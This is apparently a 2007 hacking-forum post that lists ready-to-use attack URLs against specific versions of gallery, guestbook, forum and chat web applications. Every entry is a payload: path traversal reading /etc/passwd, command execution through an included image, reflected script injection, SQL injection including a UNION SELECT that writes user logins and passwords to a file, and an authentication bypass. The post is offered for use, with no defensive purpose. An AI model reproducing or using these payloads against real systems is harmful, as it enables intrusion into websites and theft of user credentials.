
21.02.2007, 03:15
Regular member
Registered: 06.12.2006
Posts: 321
With us:
10226273
Reputation:
370
A couple more:
Galleries:
4images 1.7.1
http://[target]/[path]/index.php?template=../../../../../../../../../../../etc/passwd%00
http://[target]/[path]/index.php?cmd=ls%0-la&template=../../data/tmp_media/suntzu1293.jpg%00
35mmslidegallery 6
http://example.com/lumet/album/index.php?imgdir='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?w='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?h='><script>alert(10)</script>
http://example.com/lumet/album/popup.php?t='><script>alert(10)</script>
Guestbooks:
@lex Guestbook 4.0.1
http://[victim]/[guestbook_path]/index.php?skin=[XSS]
Forums:
ADNForum 1.0b
http://host/adnforum/index.php?fid=3333'%20union%20select%201111/*
ADP Forum 2.0.3
http://target.com/pacth/users/username.txt
CAForum 1.0
admin/default.asp?password=1'%20OR%20'1'%20=%20'1
CoolForum 0.8.3
editpost.php?forumid=1&post=3 UNION SELECT userid,login,password FROM cf_user INTO OUTFILE '/www/web/resultat.txt'%23&parent=1&p=1
CS-Forum 0.81
read.php?msg_result=[XSS]
/read.php?id=1'[SQL_SELECT]&debut=[SQL_LIMIT]
/index.php?search=%'[SQL_SELECT]%23
/index.php?debut=1[SQL]
Chats:
Andys Chat 4.5
/register.PHP?action=[CMD-Script]